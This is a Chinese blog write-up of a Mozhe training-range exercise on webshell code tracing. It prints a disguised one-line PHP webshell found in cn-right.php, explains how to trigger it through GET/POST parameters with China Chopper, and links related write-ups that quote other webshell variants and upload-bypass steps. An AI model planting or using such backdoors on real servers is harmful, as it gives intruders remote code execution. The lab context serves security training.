墨者学院 - WebShell代码分析溯源(第1题)

最新推荐文章于 2019-09-25 14:46:12 发布
最新推荐文章于 2019-09-25 14:46:12 发布
阅读量1.3k 收藏 3
点赞数
CC 4.0 BY-SA版权
分类专栏: webshell Mozhe 文章标签: caidao webshell mozhe
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_42357070/article/details/81216271
本文介绍了一种典型的一句话木马变形实例,通过分析其构造方式和利用方法,帮助读者了解此类木马的工作原理及防御措施。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

下载源码

使用seay源代码审计系统扫一扫(实在不想一个个去看。。。)

seay源代码审计系统:https://pan.baidu.com/s/1UhIqGc_wYfelqN47Tn_Qjg

 

 

下载出源代码,找到cn-right.php

 

<?php
error_reporting(0);
$_GET['POST']($_POST['GET']);
?>

典型变形一句话木马,需要构造为<?php assert($_POST['pass']);?>

则get传入“POST=assert”,POST传入密码“GET”

构造如下:http://xxxx/www/cn-right.php?POST=assert 密码为 GET
然后在菜刀连接的时候,在路径后面加上?POST=assert
密码是GET
然后寻找目标文件就ok

者靶场 入门:WebShell文件上传漏洞分析溯源(第1
qq_43233085的博客
01-15 1222
者靶场 入门:WebShell文件上传漏洞分析溯源1目背景介绍实训目标解方向解步骤 目 背景介绍 某公司内部资料分享平台存在一个文件上传页面,为了保证服务器的安全,现在安全工程师“者”将对该上传页面进行安全检测,看是否存在安全漏洞影响服务器的安全性。 实训目标 1、了解PHP及PHP5各个版本的相关知识; 2、了解PHP上传绕过扩展名的方法; 3、了解Burpsuite的使用方...
学院 - WebShell代码分析溯源(第8)
多崎巡礼的博客
08-05 769
审查代码 1、先找到黑页所在目录,观察同层级的其他文件命名和修改时间,选中可疑文件审计代码 2、没有新的发现,就去目录查找,根据最后的修改时间排查。 C:\Users\BayernChenTutu\Desktop\www_bak\fields\class-wp-rest-comment-meta-style.php   &lt;?php error_reporting(0); ...
WebShell代码分析溯源(1)学院
weixin_34161032的博客
01-10 283
一、访问链接 二、下载系统源码后直接放到D盾里扫描,扫到后门文件 三、查看该木马文件 <?phperror_reporting(0);$_GET['POST']($_POST['GET']);?> 1.error_reporting(0); 关闭错误报告 2.$_GET['POST']($_POST['GET']); 一句话木马,GET传...
学院 - WebShell代码分析溯源(第2)
多崎巡礼的博客
07-31 804
&lt;?php  $POST['POST']='assert'; $array[]=$POST; $array[0]['POST']($_POST['assert']) ;?&gt; assert,是php代码执行函数,与eval()有同样的功能,assert()函数中参数为表达式 (或者为函数) 因为$array[], POST[]都是数组,所以$array[]=$POST,就是...
WebShell文件上传漏洞分析溯源(1)
asd158923328的博客
08-20 428
靶场地址: https://www.mozhe.cn/bug/detail/cFFrR2MzZis2NGdVSkVMU1RjcDBGQT09bW96aGUmozhe 根据1.由意知是后台备份获取shell,可以利用的是一句话木马 2.进入靶场,使用弱口令登录 3.发现有上传点,上传一句话图片,上传成功后得到路径 4.由提示进行备份 5.将一句话图片得到的路径填入,名称自己填写 6.备份成...
学院-WebShell文件上传漏洞分析溯源(1)
JimWu的博客
09-05 966
WebShell文件上传漏洞分析溯源(1) 难易程度:★ 目类型:文件上传 使用工具:FireFox浏览器、burpsuite、菜刀 1.打开靶场,需要上传文件。 2.首先编写一句话木马。 3.上传试一试能否成功,发现是上传失败的。 4.再次尝试一下把php文件的后缀修改为php5。 有两种方法修改后缀: ①使用burpsuite抓包修改后缀名为php5。 ②手动把文件后缀名修改为php...
学院 - WebShell代码分析溯源(第5)
多崎巡礼的博客
08-02 876
  一个个看,,,找到该文件,经典的回调函数形式 菜刀连接, ip/www/Exception.php?POST=assert 密码为assert 得到key 关于回调函数可参考此文章 https://blog.youkuaiyun.com/qq_24196029/article/details/78118680     &lt;?php error_reporting(0); call...
学院 - WebShell代码分析溯源(第3)
多崎巡礼的博客
07-31 878
    $g是个数组,根据ASCll码对应表可以得到$g[1]='s',chr('116')='t',那么$gg=assert,@$gg($_POST[joker])不就是assert($_POST[joker]),组成了我们常见的一句话脚本 运用菜刀访问目录 ip/www/js/jquery1.42.min.php 密码get html路径下拿到key   &lt;?php...
学院 - WebShell代码分析溯源(第4)
多崎巡礼的博客
08-02 758
唉让我如此信任的工具在这道上栽了跟头。。。嗯,以后的结果仅供参考。   下载源代码,在hack文件夹下发现bin.php 打开分析代码得知其为php回调函数类一句话木马 且获得其密码,通过菜刀连接 菜刀连接http://219.153.49.228:42394/www/hack/bin.php?e=YXNzZXJ0 密码为POST array_filter()函数用回调函数过...
学院-WebShell文件上传分析溯源(第2)
JimWu的博客
09-05 977
WebShell文件上传分析溯源(第2) 难易程度:★★★★★ 目类型:文件上传 使用工具:FireFox浏览器、御剑、burpsuite、菜刀 1.打开靶场,我们没发现能到二级目录的按钮。 2.打开御剑,开始目录扫描 发现两个上传文件的地址。/admin/upload1.php和/admin/upload2.php 3.打开upload1.php,提示无权访问,跳到了upload2.php...
WebShell文件上传漏洞分析溯源
02-22
WebShell文件上传漏洞
学院 - WebShell文件上传漏洞分析溯源(1)
多崎巡礼的博客
07-26 1611
上传图片成功 上传php失败,即存在过滤 尝试更改php版本 上传成功 得到key
学院 - WebShell文件上传分析溯源(1)
多崎巡礼的博客
08-29 1082
学院 - WebShell文件上传漏洞分析溯源(第5) 一模一样啊,,, https://blog.youkuaiyun.com/qq_42357070/article/details/81665014 。。。
学院WebShell文件上传漏洞分析溯源(1)
qq_43793775的博客
09-25 749
背景介绍 某公司内部资料分享平台存在一个文件上传页面,为了保证服务器的安全,现在安全工程师“者”将对该上传页面进行安全检测,看是否存在安全漏洞影响服务器的安全性。 实训目标 1、了解PHP及PHP5各个版本的相关知识; 2、了解PHP上传绕过扩展名的方法; 3、了解Burpsuite的使用方法。 思路 根据页面提示进行文件上传,修改数据包进行上传测试。 解过程 打开靶场环境,环境首页只有一个上...
【WEB】WebShell代码分析溯源(第4)
HAPPY
08-19 1257
查看到可以webshell后定位到源代码:   这个的用法: get网址中传入 ?e=YXNzZXJ0   (arrest的base64加密值为YXNzZXJ0) 菜刀连接用法: http://www.xxx.com/3.php?e=YXNzZXJ0 密码:POST 详解:base64_decode()函数主要用于base64的解码,YXNzZXJ0的base64解码后的结果为...
- WebShell代码分析溯源(1)
吃肉唐僧的博客
07-12 240
下载源码后,一个一个文件看 看到一句话木马文件, 至于代码是什么意思我有一篇博客做的时候已经详细探究过:https://blog.youkuaiyun.com/qq_39936434/article/details/95591629 接下开就是菜刀无惧链接 ...
- WebShell代码分析溯源(第8)
吃肉唐僧的博客
07-15 363
这是一道很坑的目......花了我两天时间才搞完 先上解思路 下载文件,根据目提示说注意修改时间 一个个查看,当查看到fields文件时 大部分时间为2016.10.30,注入木马的文件是隐蔽的不想被人发现的, 所以应该不会大范围的改动文件,2.12这个文件在10.30这个日期的前面应该不可能, 最后定位到cass-wp-rest-comment-meta-style....
学院WebShell文件上传漏洞分析溯源(1)
最新发布
04-03
### 学院 WebShell 文件上传漏洞分析与溯源方法 #### 背景概述 WebShell 是一种嵌入到目标服务器中的脚本程序,攻击者可以通过它远程控制受害者的服务器。文件上传漏洞通常允许攻击者通过伪造请求或其他手段绕...
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值